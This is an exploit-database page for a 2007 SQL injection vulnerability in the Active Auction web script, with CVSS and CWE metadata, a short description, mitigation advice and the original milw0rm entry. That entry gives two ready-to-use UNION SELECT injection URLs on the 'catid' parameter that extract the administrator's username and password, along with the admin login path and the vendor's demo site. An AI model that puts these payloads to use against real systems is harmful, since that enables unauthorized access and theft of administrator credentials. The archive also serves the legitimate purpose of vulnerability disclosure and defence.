header-logo
Suggest Exploit
vendor:
Active Auction
by:
CyberGhost
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Active Auction
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Active Auction Remote SQL Injection Vulnerability

This vulnerability allows an attacker to perform a SQL injection attack on the Active Auction script. By manipulating the 'catid' parameter in the URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database. The specific SQL injection payload is 'catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1' for the username and 'catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1' for the password.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks. Users are advised to update to the latest version of the Active Auction script.
Source

Exploit-DB raw data:

#Title  : Active Auction Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.activewebsoftwares.com/demoactiveauction
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=1

#Vuln.

#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-03-23]

Navigation

Suggest Exploit

Services By CQR